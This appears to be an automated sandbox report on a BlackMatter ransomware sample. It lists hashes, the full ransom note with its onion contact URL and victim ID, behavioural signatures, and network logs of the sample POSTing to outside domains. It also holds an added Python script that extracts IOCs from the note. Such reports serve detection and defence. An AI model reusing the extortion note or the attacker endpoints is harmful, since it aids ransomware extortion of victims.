Analysis

  • max time kernel
    119s
  • max time network
    126s
  • platform
    windows10_x64
  • resource
    win10-en-20211104
  • submitted
    23-11-2021 11:06

General

  • Target

    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe

  • Size

    67KB

  • MD5

    598c53bfef81e489375f09792e487f1a

  • SHA1

    80a29bd2c349a8588edf42653ed739054f9a10f5

  • SHA256

    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6

  • SHA512

    6a82ad5009588d2fa343bef8d9d2a02e2e76eec14979487a929a96a6b6965e82265a69ef8dd29a01927e9713468de3aedd7b5ee5e79839a1a50649855a160c35

Score
10/10

Malware Config

Extracted

Path

C:\eeWDzMyD5.README.txt

Family

blackmatter

Ransom Note
~+ * + ' BLACK | () .-.,='``'=. - o - '=/_ \ | * | '=._ | \ `=./`, ' . '=.__.=' `=' * + Matter + O * ' .
>>> What happens?
Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver. We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.
>>> What guarantees?
We are not a politically motivated group and we do not need anything other than your money. If you pay, we will provide you the programs for decryption and we will delete your data. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. We always keep our promises.
>> Data leak includes
1. Full emloyeers personal data
2. Network information
3. Schemes of buildings, active project information, architect details and contracts,
4. Finance info
>>> How to contact with us?
1. Download and install TOR Browser (https://www.torproject.org/).
2. Open http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/7NT6LXKC1XQHW5039BLOV.
>>> Warning! Recovery recommendations.
We strongly recommend you to do not MODIFY or REPAIR your files, that will damage them.
URLs

http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/7NT6LXKC1XQHW5039BLOV
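The extracted config above is what an analyst actually reuses: the .onion portal, the per-victim path on it, and the note path. The following is an added example (not part of this report or of any sandbox code) that pulls those IOCs out of the note text and infers the appended file extension from the note name. The note sample is constructed from the wording above with the ASCII-art banner left out; the rule that `<ext>.README.txt` names the extension appended to encrypted files follows the DarkSide/BlackMatter convention and is an assumption about this sample, since the report only counts the renamed files as "2 IoCs" without listing them.

```python
import re

# Constructed sample: the ransom note extracted above, with the ASCII-art
# banner left out; the wording of the remaining lines is taken from the report.
NOTE = """>>> What happens? Your network is encrypted, and currently not operational.
We have downloaded 1TB from your fileserver.
>>> How to contact with us?
1. Download and install TOR Browser (https://www.torproject.org/).
2. Open http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/7NT6LXKC1XQHW5039BLOV.
>>> Warning! Recovery recommendations.
We strongly recommend you to do not MODIFY or REPAIR your files, that will damage them."""

NOTE_PATH = r"C:\eeWDzMyD5.README.txt"

# A v3 onion hostname is 56 base32 characters; the optional path segment is
# the per-victim identifier the operators use on their portal.
ONION_URL = re.compile(r"https?://([a-z2-7]{56})\.onion(?:/([A-Za-z0-9]+))?", re.I)
# Anything else that looks like a URL (here only the Tor download link).
CLEARNET_URL = re.compile(r"https?://(?![a-z2-7]{56}\.onion)[^\s()]+", re.I)


def extract_note_iocs(note):
    """Pull contact URLs and victim IDs out of a ransom note.

    Returns the full onion URLs, the bare onion hostnames (for blocklists),
    the victim IDs taken from the URL path, and any clearnet URLs, which are
    usually just the Tor download link and not an IOC in themselves.
    """
    onion_urls, onion_hosts, victim_ids = [], [], []
    for m in ONION_URL.finditer(note):
        onion_urls.append(m.group(0))
        onion_hosts.append(m.group(1).lower() + ".onion")
        if m.group(2):
            victim_ids.append(m.group(2))
    clearnet = [m.group(0).rstrip(".),") for m in CLEARNET_URL.finditer(note)]
    return {
        "onion_urls": onion_urls,
        "onion_hosts": onion_hosts,
        "victim_ids": victim_ids,
        "clearnet_urls": clearnet,
    }


# DarkSide/BlackMatter name the note <ext>.README.txt, where <ext> is the
# extension appended to encrypted files. Assumption for this sample: the
# report does not list the renamed files, so this is inferred, not observed.
NOTE_NAME = re.compile(r"([A-Za-z0-9]+)\.README\.txt$", re.I)


def extension_from_note_path(path):
    """Return the appended extension implied by the note file name, or None."""
    name = path.replace("\\", "/").rsplit("/", 1)[-1]
    m = NOTE_NAME.search(name)
    return m.group(1) if m else None


if __name__ == "__main__":
    print(extract_note_iocs(NOTE))
    print("hunt for files named *.", extension_from_note_path(NOTE_PATH))
```

The victim ID is the one value worth correlating across submissions: two samples that share the onion host but carry different path segments were built for different victims, while the same path in two different binaries points at one intrusion.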

Signatures

  • BlackMatter Ransomware

    The BlackMatter ransomware group claims to be the successor of DarkSide and REvil.

  • Modifies extensions of user files 2 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Modifies Control Panel 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe
    "C:\Users\Admin\AppData\Local\Temp\22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe"
    1⤵
    • Modifies extensions of user files
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Modifies Control Panel
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2632
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2208

Network

  • flag-us
    DNS
    paymenthacks.com
    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe
    Remote address:
    8.8.8.8:53
    Request
    paymenthacks.com
    IN A
    Response
    paymenthacks.com
    IN A
    103.224.212.222
  • flag-us
    POST
    https://paymenthacks.com/?7stO9U=YFKDr9WITbCcbkQQvqH&ju50=mjJ2ArFSzxlu1ylWh&GD21QVGNY=wVkjExWV7jYwrCe6f&UJ4dojwtU=oviX494zKRSRALUqwfR&Nq1y16t0=ug5KfMVOv&TsvTIVsd=Led0z2jSpkTSN4pifA&iHc=1iiZAeExWHa&EBUjq=oP8tq&yhiWS=Qzr&LgDS=SDA5e3y&Clsfg18=fbKWhSKUtw5cBKh&Qbu=sRChqB6TmzIBZs8&fidkTUPk=i7qZkVqXA&CVmjsFF=w0pAGIP&WhSFC7E=mDq76&gtSnATFUX=tgPc7OvEGH&TqL8rk=MZUVUTGKQ&hsLs30=qDc&bMjuda=clYniduzE30VY94
    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe
    Remote address:
    103.224.212.222:443
    Request
    POST /?7stO9U=YFKDr9WITbCcbkQQvqH&ju50=mjJ2ArFSzxlu1ylWh&GD21QVGNY=wVkjExWV7jYwrCe6f&UJ4dojwtU=oviX494zKRSRALUqwfR&Nq1y16t0=ug5KfMVOv&TsvTIVsd=Led0z2jSpkTSN4pifA&iHc=1iiZAeExWHa&EBUjq=oP8tq&yhiWS=Qzr&LgDS=SDA5e3y&Clsfg18=fbKWhSKUtw5cBKh&Qbu=sRChqB6TmzIBZs8&fidkTUPk=i7qZkVqXA&CVmjsFF=w0pAGIP&WhSFC7E=mDq76&gtSnATFUX=tgPc7OvEGH&TqL8rk=MZUVUTGKQ&hsLs30=qDc&bMjuda=clYniduzE30VY94 HTTP/1.1
    Accept: */*
    Connection: keep-alive
    Accept-Encoding: gzip, deflate, br
    Content-Type: text/plain
    User-Agent: Firefox/89.0
    Host: paymenthacks.com
    Content-Length: 853
    Cache-Control: no-cache
    Response
    HTTP/1.1 302 Found
    Date: Tue, 23 Nov 2021 11:06:34 GMT
    Server: Apache/2.4.25 (Debian)
    Set-Cookie: __tad=1637665594.1560302; expires=Fri, 21-Nov-2031 11:06:34 GMT; Max-Age=315360000
    Location: http://ww25.paymenthacks.com/?7stO9U=YFKDr9WITbCcbkQQvqH&ju50=mjJ2ArFSzxlu1ylWh&GD21QVGNY=wVkjExWV7jYwrCe6f&UJ4dojwtU=oviX494zKRSRALUqwfR&Nq1y16t0=ug5KfMVOv&TsvTIVsd=Led0z2jSpkTSN4pifA&iHc=1iiZAeExWHa&EBUjq=oP8tq&yhiWS=Qzr&LgDS=SDA5e3y&Clsfg18=fbKWhSKUtw5cBKh&Qbu=sRChqB6TmzIBZs8&fidkTUPk=i7qZkVqXA&CVmjsFF=w0pAGIP&WhSFC7E=mDq76&gtSnATFUX=tgPc7OvEGH&TqL8rk=MZUVUTGKQ&hsLs30=qDc&bMjuda=clYniduzE30VY94&subid1=20211123-2206-3491-8c29-81ae9efc1874
    Content-Length: 0
    Connection: close
    Content-Type: text/html; charset=UTF-8
  • flag-us
    DNS
    ww25.paymenthacks.com
    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe
    Remote address:
    8.8.8.8:53
    Request
    ww25.paymenthacks.com
    IN A
    Response
    ww25.paymenthacks.com
    IN CNAME
    77026.bodis.com
    77026.bodis.com
    IN A
    199.59.242.153
  • flag-us
    GET
    http://ww25.paymenthacks.com/?7stO9U=YFKDr9WITbCcbkQQvqH&ju50=mjJ2ArFSzxlu1ylWh&GD21QVGNY=wVkjExWV7jYwrCe6f&UJ4dojwtU=oviX494zKRSRALUqwfR&Nq1y16t0=ug5KfMVOv&TsvTIVsd=Led0z2jSpkTSN4pifA&iHc=1iiZAeExWHa&EBUjq=oP8tq&yhiWS=Qzr&LgDS=SDA5e3y&Clsfg18=fbKWhSKUtw5cBKh&Qbu=sRChqB6TmzIBZs8&fidkTUPk=i7qZkVqXA&CVmjsFF=w0pAGIP&WhSFC7E=mDq76&gtSnATFUX=tgPc7OvEGH&TqL8rk=MZUVUTGKQ&hsLs30=qDc&bMjuda=clYniduzE30VY94&subid1=20211123-2206-3491-8c29-81ae9efc1874
    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe
    Remote address:
    199.59.242.153:80
    Request
    GET /?7stO9U=YFKDr9WITbCcbkQQvqH&ju50=mjJ2ArFSzxlu1ylWh&GD21QVGNY=wVkjExWV7jYwrCe6f&UJ4dojwtU=oviX494zKRSRALUqwfR&Nq1y16t0=ug5KfMVOv&TsvTIVsd=Led0z2jSpkTSN4pifA&iHc=1iiZAeExWHa&EBUjq=oP8tq&yhiWS=Qzr&LgDS=SDA5e3y&Clsfg18=fbKWhSKUtw5cBKh&Qbu=sRChqB6TmzIBZs8&fidkTUPk=i7qZkVqXA&CVmjsFF=w0pAGIP&WhSFC7E=mDq76&gtSnATFUX=tgPc7OvEGH&TqL8rk=MZUVUTGKQ&hsLs30=qDc&bMjuda=clYniduzE30VY94&subid1=20211123-2206-3491-8c29-81ae9efc1874 HTTP/1.1
    Accept: */*
    Connection: keep-alive
    Accept-Encoding: gzip, deflate, br
    User-Agent: Firefox/89.0
    Cache-Control: no-cache
    Host: ww25.paymenthacks.com
    Cookie: __tad=1637665594.1560302
    Response
    HTTP/1.1 200 OK
    Server: openresty
    Date: Tue, 23 Nov 2021 11:06:35 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: parking_session=70fca3d5-b0e7-bbfb-c656-f95540f31937; expires=Tue, 23-Nov-2021 11:21:35 GMT; Max-Age=900; path=/; HttpOnly
    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_YfUkHW2CNxsqE2mX6CZwKfN2S69/N1S55APHO93GjwUpR0+EfhC+8LW8MdZ6e+ChTil90aGBycV3lPFkU/rVlg==
    Cache-Control: no-cache
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    Cache-Control: no-store, must-revalidate
    Cache-Control: post-check=0, pre-check=0
    Pragma: no-cache
    Content-Encoding: gzip
  • flag-us
    POST
    http://paymenthacks.com/?7stO9U=YFKDr9WITbCcbkQQvqH&ju50=mjJ2ArFSzxlu1ylWh&GD21QVGNY=wVkjExWV7jYwrCe6f&UJ4dojwtU=oviX494zKRSRALUqwfR&Nq1y16t0=ug5KfMVOv&TsvTIVsd=Led0z2jSpkTSN4pifA&iHc=1iiZAeExWHa&EBUjq=oP8tq&yhiWS=Qzr&LgDS=SDA5e3y&Clsfg18=fbKWhSKUtw5cBKh&Qbu=sRChqB6TmzIBZs8&fidkTUPk=i7qZkVqXA&CVmjsFF=w0pAGIP&WhSFC7E=mDq76&gtSnATFUX=tgPc7OvEGH&TqL8rk=MZUVUTGKQ&hsLs30=qDc&bMjuda=clYniduzE30VY94
    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe
    Remote address:
    103.224.212.222:80
    Request
    POST /?7stO9U=YFKDr9WITbCcbkQQvqH&ju50=mjJ2ArFSzxlu1ylWh&GD21QVGNY=wVkjExWV7jYwrCe6f&UJ4dojwtU=oviX494zKRSRALUqwfR&Nq1y16t0=ug5KfMVOv&TsvTIVsd=Led0z2jSpkTSN4pifA&iHc=1iiZAeExWHa&EBUjq=oP8tq&yhiWS=Qzr&LgDS=SDA5e3y&Clsfg18=fbKWhSKUtw5cBKh&Qbu=sRChqB6TmzIBZs8&fidkTUPk=i7qZkVqXA&CVmjsFF=w0pAGIP&WhSFC7E=mDq76&gtSnATFUX=tgPc7OvEGH&TqL8rk=MZUVUTGKQ&hsLs30=qDc&bMjuda=clYniduzE30VY94 HTTP/1.1
    Accept: */*
    Connection: keep-alive
    Accept-Encoding: gzip, deflate, br
    Content-Type: text/plain
    User-Agent: Firefox/89.0
    Host: paymenthacks.com
    Content-Length: 853
    Cache-Control: no-cache
    Cookie: __tad=1637665594.1560302
    Response
    HTTP/1.1 302 Found
    Date: Tue, 23 Nov 2021 11:06:35 GMT
    Server: Apache/2.4.25 (Debian)
    Location: http://ww25.paymenthacks.com/?7stO9U=YFKDr9WITbCcbkQQvqH&ju50=mjJ2ArFSzxlu1ylWh&GD21QVGNY=wVkjExWV7jYwrCe6f&UJ4dojwtU=oviX494zKRSRALUqwfR&Nq1y16t0=ug5KfMVOv&TsvTIVsd=Led0z2jSpkTSN4pifA&iHc=1iiZAeExWHa&EBUjq=oP8tq&yhiWS=Qzr&LgDS=SDA5e3y&Clsfg18=fbKWhSKUtw5cBKh&Qbu=sRChqB6TmzIBZs8&fidkTUPk=i7qZkVqXA&CVmjsFF=w0pAGIP&WhSFC7E=mDq76&gtSnATFUX=tgPc7OvEGH&TqL8rk=MZUVUTGKQ&hsLs30=qDc&bMjuda=clYniduzE30VY94&subid1=20211123-2206-3558-8060-76b2b34a1a3f
    Content-Length: 0
    Connection: close
    Content-Type: text/html; charset=UTF-8
  • flag-us
    GET
    http://ww25.paymenthacks.com/?7stO9U=YFKDr9WITbCcbkQQvqH&ju50=mjJ2ArFSzxlu1ylWh&GD21QVGNY=wVkjExWV7jYwrCe6f&UJ4dojwtU=oviX494zKRSRALUqwfR&Nq1y16t0=ug5KfMVOv&TsvTIVsd=Led0z2jSpkTSN4pifA&iHc=1iiZAeExWHa&EBUjq=oP8tq&yhiWS=Qzr&LgDS=SDA5e3y&Clsfg18=fbKWhSKUtw5cBKh&Qbu=sRChqB6TmzIBZs8&fidkTUPk=i7qZkVqXA&CVmjsFF=w0pAGIP&WhSFC7E=mDq76&gtSnATFUX=tgPc7OvEGH&TqL8rk=MZUVUTGKQ&hsLs30=qDc&bMjuda=clYniduzE30VY94&subid1=20211123-2206-3558-8060-76b2b34a1a3f
    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe
    Remote address:
    199.59.242.153:80
    Request
    GET /?7stO9U=YFKDr9WITbCcbkQQvqH&ju50=mjJ2ArFSzxlu1ylWh&GD21QVGNY=wVkjExWV7jYwrCe6f&UJ4dojwtU=oviX494zKRSRALUqwfR&Nq1y16t0=ug5KfMVOv&TsvTIVsd=Led0z2jSpkTSN4pifA&iHc=1iiZAeExWHa&EBUjq=oP8tq&yhiWS=Qzr&LgDS=SDA5e3y&Clsfg18=fbKWhSKUtw5cBKh&Qbu=sRChqB6TmzIBZs8&fidkTUPk=i7qZkVqXA&CVmjsFF=w0pAGIP&WhSFC7E=mDq76&gtSnATFUX=tgPc7OvEGH&TqL8rk=MZUVUTGKQ&hsLs30=qDc&bMjuda=clYniduzE30VY94&subid1=20211123-2206-3558-8060-76b2b34a1a3f HTTP/1.1
    Accept: */*
    Connection: keep-alive
    Accept-Encoding: gzip, deflate, br
    User-Agent: Firefox/89.0
    Cache-Control: no-cache
    Host: ww25.paymenthacks.com
    Cookie: __tad=1637665594.1560302; parking_session=70fca3d5-b0e7-bbfb-c656-f95540f31937
    Response
    HTTP/1.1 200 OK
    Server: openresty
    Date: Tue, 23 Nov 2021 11:06:36 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: parking_session=70fca3d5-b0e7-bbfb-c656-f95540f31937; expires=Tue, 23-Nov-2021 11:21:36 GMT; Max-Age=900; path=/; HttpOnly
    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_f0Eh9D/OalvPDVSONUVsPVDWIqHaODBpHwZOXpj4rExwVrbWyH+GERoLwzJcpfx2evejpmR7lYXvt37BOIDMnA==
    Cache-Control: no-cache
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    Cache-Control: no-store, must-revalidate
    Cache-Control: post-check=0, pre-check=0
    Pragma: no-cache
    Content-Encoding: gzip
  • flag-us
    DNS
    mojobiden.com
    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe
    Remote address:
    8.8.8.8:53
    Request
    mojobiden.com
    IN A
    Response
  • flag-us
    POST
    https://paymenthacks.com/?9cbMHn0=OSPSZfwlY7hEFcNSitE&BzIbYQ=oXuYfQDfebyfy&wyZm3YLNW=MCfId3m&m6P=LiUfm1&4HG=65etoeVwfjErQ&JMjbeHUd=YtsrN&5h85=D0Sp2PE056&Zulkq=m9g&rqTBKZ=6XgJ2Fa0JAhv&VU8hKR=KVspLObkI&GH3SP2L=VU522xANbKRe&hgH4Sv=9JUTkb0LlUDCUF4p
    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe
    Remote address:
    103.224.212.222:443
    Request
    POST /?9cbMHn0=OSPSZfwlY7hEFcNSitE&BzIbYQ=oXuYfQDfebyfy&wyZm3YLNW=MCfId3m&m6P=LiUfm1&4HG=65etoeVwfjErQ&JMjbeHUd=YtsrN&5h85=D0Sp2PE056&Zulkq=m9g&rqTBKZ=6XgJ2Fa0JAhv&VU8hKR=KVspLObkI&GH3SP2L=VU522xANbKRe&hgH4Sv=9JUTkb0LlUDCUF4p HTTP/1.1
    Accept: */*
    Connection: keep-alive
    Accept-Encoding: gzip, deflate, br
    Content-Type: text/plain
    User-Agent: Firefox/89.0
    Host: paymenthacks.com
    Content-Length: 657
    Cache-Control: no-cache
    Cookie: __tad=1637665594.1560302
    Response
    HTTP/1.1 302 Found
    Date: Tue, 23 Nov 2021 11:06:38 GMT
    Server: Apache/2.4.25 (Debian)
    Location: http://ww25.paymenthacks.com/?9cbMHn0=OSPSZfwlY7hEFcNSitE&BzIbYQ=oXuYfQDfebyfy&wyZm3YLNW=MCfId3m&m6P=LiUfm1&4HG=65etoeVwfjErQ&JMjbeHUd=YtsrN&5h85=D0Sp2PE056&Zulkq=m9g&rqTBKZ=6XgJ2Fa0JAhv&VU8hKR=KVspLObkI&GH3SP2L=VU522xANbKRe&hgH4Sv=9JUTkb0LlUDCUF4p&subid1=20211123-2206-3893-a9aa-932565da47dd
    Content-Length: 0
    Connection: close
    Content-Type: text/html; charset=UTF-8
  • flag-us
    GET
    http://ww25.paymenthacks.com/?9cbMHn0=OSPSZfwlY7hEFcNSitE&BzIbYQ=oXuYfQDfebyfy&wyZm3YLNW=MCfId3m&m6P=LiUfm1&4HG=65etoeVwfjErQ&JMjbeHUd=YtsrN&5h85=D0Sp2PE056&Zulkq=m9g&rqTBKZ=6XgJ2Fa0JAhv&VU8hKR=KVspLObkI&GH3SP2L=VU522xANbKRe&hgH4Sv=9JUTkb0LlUDCUF4p&subid1=20211123-2206-3893-a9aa-932565da47dd
    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe
    Remote address:
    199.59.242.153:80
    Request
    GET /?9cbMHn0=OSPSZfwlY7hEFcNSitE&BzIbYQ=oXuYfQDfebyfy&wyZm3YLNW=MCfId3m&m6P=LiUfm1&4HG=65etoeVwfjErQ&JMjbeHUd=YtsrN&5h85=D0Sp2PE056&Zulkq=m9g&rqTBKZ=6XgJ2Fa0JAhv&VU8hKR=KVspLObkI&GH3SP2L=VU522xANbKRe&hgH4Sv=9JUTkb0LlUDCUF4p&subid1=20211123-2206-3893-a9aa-932565da47dd HTTP/1.1
    Accept: */*
    Connection: keep-alive
    Accept-Encoding: gzip, deflate, br
    User-Agent: Firefox/89.0
    Cache-Control: no-cache
    Host: ww25.paymenthacks.com
    Cookie: __tad=1637665594.1560302; parking_session=70fca3d5-b0e7-bbfb-c656-f95540f31937
    Response
    HTTP/1.1 200 OK
    Server: openresty
    Date: Tue, 23 Nov 2021 11:06:38 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: parking_session=70fca3d5-b0e7-bbfb-c656-f95540f31937; expires=Tue, 23-Nov-2021 11:21:38 GMT; Max-Age=900; path=/; HttpOnly
    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_y6AZQrJQbSmbaISgHEtYIskp93Xj7gDgZFLPXOIMHCV3BhUpCdRX4dvpX/r+AWC3YRxDI/qTyI8NyjFgKgzLGw==
    Cache-Control: no-cache
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    Cache-Control: no-store, must-revalidate
    Cache-Control: post-check=0, pre-check=0
    Pragma: no-cache
    Content-Encoding: gzip
  • flag-us
    POST
    http://paymenthacks.com/?9cbMHn0=OSPSZfwlY7hEFcNSitE&BzIbYQ=oXuYfQDfebyfy&wyZm3YLNW=MCfId3m&m6P=LiUfm1&4HG=65etoeVwfjErQ&JMjbeHUd=YtsrN&5h85=D0Sp2PE056&Zulkq=m9g&rqTBKZ=6XgJ2Fa0JAhv&VU8hKR=KVspLObkI&GH3SP2L=VU522xANbKRe&hgH4Sv=9JUTkb0LlUDCUF4p
    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe
    Remote address:
    103.224.212.222:80
    Request
    POST /?9cbMHn0=OSPSZfwlY7hEFcNSitE&BzIbYQ=oXuYfQDfebyfy&wyZm3YLNW=MCfId3m&m6P=LiUfm1&4HG=65etoeVwfjErQ&JMjbeHUd=YtsrN&5h85=D0Sp2PE056&Zulkq=m9g&rqTBKZ=6XgJ2Fa0JAhv&VU8hKR=KVspLObkI&GH3SP2L=VU522xANbKRe&hgH4Sv=9JUTkb0LlUDCUF4p HTTP/1.1
    Accept: */*
    Connection: keep-alive
    Accept-Encoding: gzip, deflate, br
    Content-Type: text/plain
    User-Agent: Firefox/89.0
    Host: paymenthacks.com
    Content-Length: 657
    Cache-Control: no-cache
    Cookie: __tad=1637665594.1560302
    Response
    HTTP/1.1 302 Found
    Date: Tue, 23 Nov 2021 11:06:38 GMT
    Server: Apache/2.4.25 (Debian)
    Location: http://ww25.paymenthacks.com/?9cbMHn0=OSPSZfwlY7hEFcNSitE&BzIbYQ=oXuYfQDfebyfy&wyZm3YLNW=MCfId3m&m6P=LiUfm1&4HG=65etoeVwfjErQ&JMjbeHUd=YtsrN&5h85=D0Sp2PE056&Zulkq=m9g&rqTBKZ=6XgJ2Fa0JAhv&VU8hKR=KVspLObkI&GH3SP2L=VU522xANbKRe&hgH4Sv=9JUTkb0LlUDCUF4p&subid1=20211123-2206-3877-b811-d79b46f7f999
    Content-Length: 0
    Connection: close
    Content-Type: text/html; charset=UTF-8
  • flag-us
    GET
    http://ww25.paymenthacks.com/?9cbMHn0=OSPSZfwlY7hEFcNSitE&BzIbYQ=oXuYfQDfebyfy&wyZm3YLNW=MCfId3m&m6P=LiUfm1&4HG=65etoeVwfjErQ&JMjbeHUd=YtsrN&5h85=D0Sp2PE056&Zulkq=m9g&rqTBKZ=6XgJ2Fa0JAhv&VU8hKR=KVspLObkI&GH3SP2L=VU522xANbKRe&hgH4Sv=9JUTkb0LlUDCUF4p&subid1=20211123-2206-3877-b811-d79b46f7f999
    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe
    Remote address:
    199.59.242.153:80
    Request
    GET /?9cbMHn0=OSPSZfwlY7hEFcNSitE&BzIbYQ=oXuYfQDfebyfy&wyZm3YLNW=MCfId3m&m6P=LiUfm1&4HG=65etoeVwfjErQ&JMjbeHUd=YtsrN&5h85=D0Sp2PE056&Zulkq=m9g&rqTBKZ=6XgJ2Fa0JAhv&VU8hKR=KVspLObkI&GH3SP2L=VU522xANbKRe&hgH4Sv=9JUTkb0LlUDCUF4p&subid1=20211123-2206-3877-b811-d79b46f7f999 HTTP/1.1
    Accept: */*
    Connection: keep-alive
    Accept-Encoding: gzip, deflate, br
    User-Agent: Firefox/89.0
    Cache-Control: no-cache
    Host: ww25.paymenthacks.com
    Cookie: __tad=1637665594.1560302; parking_session=70fca3d5-b0e7-bbfb-c656-f95540f31937
    Response
    HTTP/1.1 200 OK
    Server: openresty
    Date: Tue, 23 Nov 2021 11:06:39 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: parking_session=70fca3d5-b0e7-bbfb-c656-f95540f31937; expires=Tue, 23-Nov-2021 11:21:39 GMT; Max-Age=900; path=/; HttpOnly
    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_gayzfP/+bnl4x1xtmXm5NFFgOQ1/LmfW/T8YUhkq2qY6V0z/m8gq83AAeWYBw2ijKn+6D46S/XtqpvWPRUF95g==
    Cache-Control: no-cache
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    Cache-Control: no-store, must-revalidate
    Cache-Control: post-check=0, pre-check=0
    Pragma: no-cache
    Content-Encoding: gzip
  • flag-us
    DNS
    time.windows.com
    Remote address:
    8.8.8.8:53
    Request
    time.windows.com
    IN A
    Response
    time.windows.com
    IN CNAME
    twc.trafficmanager.net
    twc.trafficmanager.net
    IN A
    20.101.57.9
  • 103.224.212.222:443
    https://paymenthacks.com/?7stO9U=YFKDr9WITbCcbkQQvqH&ju50=mjJ2ArFSzxlu1ylWh&GD21QVGNY=wVkjExWV7jYwrCe6f&UJ4dojwtU=oviX494zKRSRALUqwfR&Nq1y16t0=ug5KfMVOv&TsvTIVsd=Led0z2jSpkTSN4pifA&iHc=1iiZAeExWHa&EBUjq=oP8tq&yhiWS=Qzr&LgDS=SDA5e3y&Clsfg18=fbKWhSKUtw5cBKh&Qbu=sRChqB6TmzIBZs8&fidkTUPk=i7qZkVqXA&CVmjsFF=w0pAGIP&WhSFC7E=mDq76&gtSnATFUX=tgPc7OvEGH&TqL8rk=MZUVUTGKQ&hsLs30=qDc&bMjuda=clYniduzE30VY94
    tls, http
    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe
    2.6kB
    7.6kB
    17
    11

    HTTP Request

    POST https://paymenthacks.com/?7stO9U=YFKDr9WITbCcbkQQvqH&ju50=mjJ2ArFSzxlu1ylWh&GD21QVGNY=wVkjExWV7jYwrCe6f&UJ4dojwtU=oviX494zKRSRALUqwfR&Nq1y16t0=ug5KfMVOv&TsvTIVsd=Led0z2jSpkTSN4pifA&iHc=1iiZAeExWHa&EBUjq=oP8tq&yhiWS=Qzr&LgDS=SDA5e3y&Clsfg18=fbKWhSKUtw5cBKh&Qbu=sRChqB6TmzIBZs8&fidkTUPk=i7qZkVqXA&CVmjsFF=w0pAGIP&WhSFC7E=mDq76&gtSnATFUX=tgPc7OvEGH&TqL8rk=MZUVUTGKQ&hsLs30=qDc&bMjuda=clYniduzE30VY94

    HTTP Response

    302
  • 199.59.242.153:80
